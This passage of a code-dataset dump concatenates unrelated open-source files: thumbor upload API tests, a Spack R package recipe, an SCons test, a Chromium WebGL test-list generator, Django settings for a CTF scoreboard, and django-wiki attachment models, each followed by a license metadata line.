expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_with_charset(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg;charset=UTF-8'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_with_unknown_charset(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/thisIsAUnknwonOrBadlyFormedCHarset'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_image_without_filename(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_can_post_from_html_form(self):
filename = 'crocodile2.jpg'
image = ('media', filename, valid_image())
response = self.post_files(self.base_uri, {'Slug': 'another_filename.jpg'}, (image, ))
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
class UploadAPIUpdateFileTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_modify_existing_image(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(204)
id_should_exist = re.compile(self.base_uri + r'/([^\/]{32})/' + filename).search(location).group(1)
expected_path = self.upload_storage.path_on_filesystem(id_should_exist)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(too_small_image_path)
id_shouldnt_exist = re.compile(self.base_uri + r'/(.*)').search(location).group(1)
expected_path = self.upload_storage.path_on_filesystem(id_shouldnt_exist)
expect(expected_path).not_to_exist()
class UploadAPIUpdateSmallIdFileTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
cfg.MAX_ID_LENGTH = 36
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_cant_get_truncated_id_when_stored_with_large_id(self):
image_id = 'e5bcf126-791b-4375-9f73-925ab8b9fb5f'
path = '/image/%s' % image_id
response = self.put(path, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(204)
response = self.get(path[:7 + 32], {'Accept': 'image/jpeg'})
expect(response.code).to_equal(404)
def test_can_get_actual_id_when_stored_with_large_id(self):
path = '/image/e5bcf126-791b-4375-9f73-925ab8b9fb5g'
self.put(path, {'Content-Type': 'image/jpeg'}, valid_image())
response = self.get(path + '123456', {'Accept': 'image/jpeg'})
expect(response.code).to_equal(200)
expect(response.body).to_be_similar_to(valid_image())
class UploadAPIDeleteTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = True
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_delete_existing_image(self):
filename = self.default_filename + '.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
image_id = re.compile(self.base_uri + r'/([^\/]{32})/' + filename).search(location).group(1)
image_location = self.upload_storage.path_on_filesystem(image_id)
expect(image_location).to_exist()
response = self.delete(location, {})
expect(response.code).to_equal(204)
expect(image_location).not_to_exist()
def test_deleting_unknown_image_returns_not_found(self):
uri = self.base_uri + '/an/unknown/image'
response = self.delete(uri, {})
expect(response.code).to_equal(404)
class UploadAPIRetrieveTestCase(UploadTestCase):
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = True
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_can_retrieve_existing_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.get(location, {'Accept': 'image/jpeg'})
expect(response.code).to_equal(200)
expect(response.body).to_be_similar_to(valid_image())
expect(response.headers['Content-Type']).to_equal('image/jpeg')
def test_retrieving_unknown_image_returns_not_found(self):
uri = self.base_uri + '/an/unknown/image'
response = self.get(uri, {'Accept': 'image/jpeg'})
expect(response.code).to_equal(404)
class UploadAPIValidationTestCase(UploadTestCase):
'''
Validation:
- Invalid image
- Size constraints
- Weight constraints
'''
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PUT_ALLOWED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
cfg.MIN_WIDTH = 40
cfg.MIN_HEIGHT = 40
cfg.UPLOAD_MAX_SIZE = 72000
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
def test_posting_invalid_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, 'invalid image')
expect(response.code).to_equal(415)
def test_posting_invalid_image_through_html_form_fails(self):
image = ('media', u'crocodile9999.jpg', 'invalid image')
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(415)
def test_modifying_existing_image_to_invalid_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, 'invalid image')
expect(response.code).to_equal(415)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_posting_a_too_small_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(412)
def test_posting_a_too_small_image_from_html_form_fails(self):
image = ('media', u'crocodile9999.jpg', too_small_image())
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(412)
def test_modifying_existing_image_to_small_image(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
expect(response.code).to_equal(201)
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_small_image())
expect(response.code).to_equal(412)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
def test_posting_an_image_too_heavy_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, too_heavy_image())
expect(response.code).to_equal(412)
def test_posting_an_image_too_heavy_through_an_html_form_fails(self):
image = ('media', u'oversized9999.jpg', too_heavy_image())
response = self.post_files(self.base_uri, {}, (image, ))
expect(response.code).to_equal(412)
def test_modifying_existing_image_to_heavy_image_fails(self):
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg'}, valid_image())
location = response.headers['Location']
response = self.put(location, {'Content-Type': 'image/jpeg'}, too_heavy_image())
expect(response.code).to_equal(412)
expected_path = self.get_path_from_location(location)
expected_path = self.upload_storage.path_on_filesystem(expected_path)
expect(expected_path).to_exist()
expect(expected_path).to_be_the_same_as(valid_image_path)
| mit | 5,535,279,842,212,091,000 | 37.764865 | 120 | 0.650003 | false |
EmreAtes/spack | var/spack/repos/builtin/packages/r-cellranger/package.py | 5 | 1774 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RCellranger(RPackage):
"""Helper functions to work with spreadsheets and the "A1:D10"
style of cell range specification."""
homepage = "https://cran.r-project.org/package=cellranger"
url = "https://cran.r-project.org/src/contrib/cellranger_1.1.0.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/cellranger"
version('1.1.0', '1abcfea6af5ab2e277cb99e86880456f')
depends_on('r-rematch', type=('build', 'run'))
depends_on('r-tibble', type=('build', 'run'))
| lgpl-2.1 | 4,760,725,381,321,043,000 | 44.487179 | 79 | 0.673619 | false |
timj/scons | test/File.py | 1 | 2021 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify that:
-- the File() global function and environment method work correctly;
-- the former does not try to expand construction variables;
-- calling File() as a method of a File() object works correctly.
"""
import TestSCons
test = TestSCons.TestSCons()
test.write('SConstruct', """
env = Environment(FOO = 'fff', BAR = 'bbb')
print(File('ddd'))
print(File('$FOO'))
print(File('${BAR}_$BAR'))
print(env.File('eee'))
print(env.File('$FOO'))
print(env.File('${BAR}_$BAR'))
f1 = env.File('f1')
print(f1)
f2 = f1.File('f2')
print(f2)
""")
expect = test.wrap_stdout(read_str = """\
ddd
$FOO
${BAR}_$BAR
eee
fff
bbb_bbb
f1
f2
""", build_str = """\
scons: `.' is up to date.
""")
test.run(stdout = expect)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -4,071,899,227,670,189,600 | 26.310811 | 73 | 0.70856 | false |
gx1997/chrome-loongson | chrome/test/gpu/generate_webgl_conformance_test_list.py | 6 | 3335 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Auto-generates the WebGL conformance test list header file.
Parses the WebGL conformance test *.txt file, which contains a list of URLs
for individual conformance tests (each on a new line). It recursively parses
*.txt files. For each test URL, the matching gtest call is created and
sent to the C++ header file.
"""
import getopt
import os
import re
import sys
COPYRIGHT = """\
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
"""
WARNING = """\
// DO NOT EDIT! This file is auto-generated by
// generate_webgl_conformance_test_list.py
// It is included by webgl_conformance_tests.cc
"""
HEADER_GUARD = """\
#ifndef CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
#define CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
"""
HEADER_GUARD_END = """
#endif // CHROME_TEST_GPU_WEBGL_CONFORMANCE_TEST_LIST_AUTOGEN_H_
"""
# Assume this script is run from the src/chrome/test/gpu directory.
INPUT_DIR = "../../../third_party/webgl_conformance"
INPUT_FILE = "00_test_list.txt"
OUTPUT_FILE = "webgl_conformance_test_list_autogen.h"
def main(argv):
"""Main function for the WebGL conformance test list generator.
"""
if not os.path.exists(os.path.join(INPUT_DIR, INPUT_FILE)):
print >> sys.stderr, "ERROR: WebGL conformance tests do not exist."
print >> sys.stderr, "Run the script from the directory containing it."
return 1
output = open(OUTPUT_FILE, "w")
output.write(COPYRIGHT)
output.write(WARNING)
output.write(HEADER_GUARD)
test_prefix = {}
unparsed_files = [INPUT_FILE]
while unparsed_files:
filename = unparsed_files.pop(0)
try:
input = open(os.path.join(INPUT_DIR, filename))
except IOError:
print >> sys.stderr, "WARNING: %s does not exist (skipped)." % filename
continue
for url in input:
url = re.sub("//.*", "", url)
url = re.sub("#.*", "", url)
url = url.strip()
# Some filename has options before them, for example,
# --min-version 1.0.2 testname.html
pos = url.rfind(" ")
if pos != -1:
url = url[pos+1:]
if not url:
continue
# Cannot use os.path.join() because Windows would use "\\", but this path
# is sent through javascript.
if os.path.dirname(filename):
url = "%s/%s" % (os.path.dirname(filename), url)
# Queue all text files for parsing, because test list URLs are nested
# through .txt files.
if re.match(".+00_test_list\.txt\s*$", url):
unparsed_files.append(url)
# Convert the filename to a valid test name and output the gtest code.
else:
name = os.path.splitext(url)[0]
name = re.sub("\W+", "_", name)
if os.path.exists(os.path.join(INPUT_DIR, url)):
output.write('CONFORMANCE_TEST(%s,\n "%s");\n' % (name, url))
else:
print >> sys.stderr, "WARNING: %s does not exist (skipped)." % url
input.close()
output.write(HEADER_GUARD_END)
output.close()
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| bsd-3-clause | -1,629,094,933,993,838,800 | 29.87963 | 77 | 0.652774 | false |
pdogg/ctfmanager | ctfmanager/settings.py | 1 | 5269 | # Django settings for ctfmanager project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'boarddb', # Or path to database file if using sqlite3.
'USER': 'boarddb', # Not used with sqlite3.
'PASSWORD': 'password', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/{{ docs_version }}/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['ctfboard.ctf']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/New_York'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = '/var/www/static/'
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'CHANGE THIS SECRET KEY!!!'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ctfmanager.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'ctfweb'
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| bsd-3-clause | -4,864,696,140,094,106,000 | 34.126667 | 120 | 0.687797 | false |
aacole/ursula-monitoring | sensu/plugins/metrics-process-usage.py | 3 | 3957 | #!/usr/bin/env python
#
# metrics-process-usage.py
#
# PLATFORMS:
# Linux
#
# DEPENDENCIES:
# Python 2.7 (not Python 3 compatible: uses print statements and dict.viewkeys())
# Python module: psutil https://pypi.python.org/pypi/psutil
#
# USAGE:
#
# metrics-process-usage.py -n <process_name> -w <cpu_warning_pct> -c <cpu_critical_pct> -W <mem_warning_pct> -C <mem_critical_pct> [-s <graphite_scheme>] [-z <criticality>]
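#   e.g. (hypothetical values): metrics-process-usage.py -n nova-api -w 50 -c 80 -W 20 -C 40 -s nova_api.usage -z warning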
#
# DESCRIPTION:
# Finds the pid[s] corresponding to a process name and obtains the necessary
# cpu and memory usage stats. Returns WARNING or CRITICAL when these stats
# exceed user specified limits.
#
# Code adapted from Jaime Gogo's script in the Sensu Plugins community:
# https://github.com/sensu-plugins/sensu-plugins-process-checks/blob/master/bin/metrics-per-process.py
#
# Released under the same terms as Sensu (the MIT license); see MITLICENSE
# for details.
#
# Siva Mullapudi <[email protected]>
import argparse
import sys
import os
import time
import psutil
STATE_OK = 0
STATE_WARNING = 1
STATE_CRITICAL = 2
CRITICALITY = 'critical'
PROC_ROOT_DIR = '/proc/'
def switch_on_criticality():
if CRITICALITY == 'warning':
sys.exit(STATE_WARNING)
else:
sys.exit(STATE_CRITICAL)
def find_pids_from_name(process_name):
'''Find process PID from name using /proc/<pids>/comm'''
pids_in_proc = [ pid for pid in os.listdir(PROC_ROOT_DIR) if pid.isdigit() ]
pids = []
for pid in pids_in_proc:
path = PROC_ROOT_DIR + pid
if 'comm' in os.listdir(path):
file_handler = open(path + '/comm', 'r')
if file_handler.read().rstrip() == process_name:
pids.append(int(pid))
return pids
def sum_dicts(dict1, dict2):
return dict(dict1.items() + dict2.items() +
[(k, dict1[k] + dict2[k]) for k in dict1.viewkeys() & dict2.viewkeys()])
def stats_per_pid(pid):
'''Gets process stats, cpu and memory usage in %, using the psutil module'''
stats = {}
process_handler = psutil.Process(pid)
stats['cpu_percent'] = process_handler.cpu_percent(interval=0.1)
stats['memory_percent'] = process_handler.memory_percent()
return stats
def multi_pid_process_stats(pids):
stats = {'cpu_percent': 0, 'memory_percent': 0}
for pid in pids:
stats = sum_dicts(stats, stats_per_pid(pid))
return stats
def graphite_printer(stats, graphite_scheme):
now = time.time()
for stat in stats:
print "%s.%s %s %d" % (graphite_scheme, stat, stats[stat], now)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--process_name', required=True)
parser.add_argument('-w', '--cpu_warning_pct', required=True)
parser.add_argument('-c', '--cpu_critical_pct', required=True)
parser.add_argument('-W', '--memory_warning_pct', required=True)
parser.add_argument('-C', '--memory_critical_pct', required=True)
parser.add_argument('-s', '--scheme', required=True)
parser.add_argument('-z', '--criticality', default='critical')
args = parser.parse_args()
    # declare the module-level name so -z/--criticality actually overrides the default
    global CRITICALITY
    CRITICALITY = args.criticality
pids = find_pids_from_name(args.process_name)
if not pids:
print 'Cannot find pids for this process. Enter a valid process name.'
switch_on_criticality()
total_process_stats = multi_pid_process_stats(pids)
graphite_printer(total_process_stats, args.scheme)
if total_process_stats['cpu_percent'] > float(args.cpu_critical_pct) or \
total_process_stats['memory_percent'] > float(args.memory_critical_pct):
print 'CPU Usage and/or memory usage at critical levels!!!'
switch_on_criticality()
if total_process_stats['cpu_percent'] > float(args.cpu_warning_pct) or \
total_process_stats['memory_percent'] > float(args.memory_warning_pct):
print 'Warning: CPU Usage and/or memory usage exceeding normal levels!'
sys.exit(STATE_WARNING)
sys.exit(STATE_OK)
if __name__ == "__main__":
main()
| apache-2.0 | 4,757,682,871,734,637,000 | 31.434426 | 173 | 0.664392 | false |
johanherman/arteria-packs | actions/lib/check_summary_report_modtime.py | 2 | 3009 | #!/usr/bin/python
"""
Usage: check_summary_report_modtime.py --directory </path/with/runfolders> --modtime <minimum summary report age in seconds> [--debug]
This script will search the given root directory for runfolders and return a json array of all runfolders
which have a summary report file that is older than the given time in seconds.
"""
import argparse
import os
import json
import sys
import time
import logging
# create logger
logger = logging.getLogger('check_summary_report_modtime')
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
def check_file_older_than(file_to_check, threshold):
summary_report_mtime = os.path.getmtime(file_to_check)
logger.debug("summary report mtime: {0}".format(summary_report_mtime))
current_time = time.time()
logger.debug("current time: {0}".format(current_time))
is_old_enough = (current_time - summary_report_mtime) > threshold
logger.debug("is old enough: {0}".format(is_old_enough))
return is_old_enough
def get_old_enough_runfolders(path_to_search, minimum_summary_report_age, runfolders):
for runfolder in runfolders:
logger.debug("runfolder: {0}".format(runfolder))
summary_report = os.path.join(path_to_search, runfolder, "Summary", "summaryReport.html")
if os.path.isfile(summary_report) and check_file_older_than(summary_report, minimum_summary_report_age):
logger.info("runfolder: {0} is old enough.".format(runfolder))
yield runfolder
else:
logger.info("runfolder: {0} is not old enough or summary report does not exist.".format(runfolder))
def main():
parser = argparse.ArgumentParser(description='Filter runfolders in a directory based on summary report '
'modtime.')
# Required arguments
parser.add_argument('--directory', required=True, help='Root directory to search for runfolders in.')
parser.add_argument('--modtime', required=True, help='The summary file needs to be older than this')
    parser.add_argument('--debug', required=False, action='store_true', help='Set to debug mode (flag, takes no value).')
parser.set_defaults(debug=False)
try:
args = parser.parse_args()
except Exception as e:
parser.print_help()
sys.exit(1)
path_to_search = args.directory
minimum_summary_report_age = int(args.modtime)
# set log level
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logger.debug("minimum file age: {0}".format(minimum_summary_report_age))
runfolder_list = (name for name in os.listdir(path_to_search) if os.path.isdir(os.path.join(path_to_search, name)))
old_enough_runfolders = list(get_old_enough_runfolders(path_to_search, minimum_summary_report_age, runfolder_list))
print(json.dumps(old_enough_runfolders))
if __name__ == "__main__":
main()
| mit | -2,863,697,152,162,887,700 | 37.088608 | 121 | 0.69126 | false |
imouren/django-wiki | wiki/plugins/attachments/models.py | 13 | 7440 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from __future__ import absolute_import
import os.path
from django.db import models
from django.utils.translation import ugettext
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import python_2_unicode_compatible
from django.conf import settings as django_settings
from . import settings
from wiki import managers
from wiki.models.pluginbase import ReusablePlugin
from wiki.models.article import BaseRevisionMixin
from django.db.models import signals
from six.moves import map
from six.moves import zip
from six.moves import range
class IllegalFileExtension(Exception):
"""File extension on upload is not allowed"""
pass
@python_2_unicode_compatible
class Attachment(ReusablePlugin):
objects = managers.ArticleFkManager()
current_revision = models.OneToOneField(
'AttachmentRevision', verbose_name=_('current revision'),
blank=True, null=True, related_name='current_set',
help_text=_(
'The revision of this attachment currently in use (on all articles using the attachment)'),)
original_filename = models.CharField(
max_length=256,
verbose_name=_('original filename'),
blank=True,
null=True)
def can_write(self, user):
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return ReusablePlugin.can_write(self, user)
def can_delete(self, user):
return self.can_write(user)
class Meta:
verbose_name = _('attachment')
verbose_name_plural = _('attachments')
# Matches label of upcoming 0.1 release
db_table = 'wiki_attachments_attachment'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def __str__(self):
return "%s: %s" % (
self.article.current_revision.title, self.original_filename)
def extension_allowed(filename):
try:
extension = filename.split(".")[-1]
except IndexError:
# No extension
raise IllegalFileExtension(
ugettext("No file extension found in filename. That's not okay!"))
if not extension.lower() in map(
lambda x: x.lower(),
settings.FILE_EXTENSIONS):
raise IllegalFileExtension(
ugettext("The following filename is illegal: %s. Extension has to be one of %s") %
(filename, ", ".join(
settings.FILE_EXTENSIONS)))
return extension
def upload_path(instance, filename):
from os import path
extension = extension_allowed(filename)
# Has to match original extension filename
if instance.id and instance.attachment and instance.attachment.original_filename:
original_extension = instance.attachment.original_filename.split(
".")[-1]
if not extension.lower() == original_extension:
raise IllegalFileExtension(
"File extension has to be '%s', not '%s'." %
(original_extension, extension.lower()))
elif instance.attachment:
instance.attachment.original_filename = filename
upload_path = settings.UPLOAD_PATH
upload_path = upload_path.replace(
'%aid', str(
instance.attachment.article.id))
if settings.UPLOAD_PATH_OBSCURIFY:
import random
import hashlib
m = hashlib.md5(
str(random.randint(0, 100000000000000)).encode('ascii'))
upload_path = path.join(upload_path, m.hexdigest())
if settings.APPEND_EXTENSION:
filename += '.upload'
return path.join(upload_path, filename)
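# Sketch of what upload_path produces (the settings values below are assumptions,
# not necessarily this project's defaults): with UPLOAD_PATH = 'wiki/attachments/%aid/',
# UPLOAD_PATH_OBSCURIFY = True and APPEND_EXTENSION = True, a file "figure.png"
# attached to article 42 is stored at something like
#   wiki/attachments/42/0f3d2a.../figure.png.upload
# where the middle component is the random md5 hex digest generated above.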
@python_2_unicode_compatible
class AttachmentRevision(BaseRevisionMixin, models.Model):
attachment = models.ForeignKey('Attachment')
file = models.FileField(upload_to=upload_path, # @ReservedAssignment
max_length=255,
verbose_name=_('file'),
storage=settings.STORAGE_BACKEND)
description = models.TextField(blank=True)
class Meta:
verbose_name = _('attachment revision')
verbose_name_plural = _('attachment revisions')
ordering = ('created',)
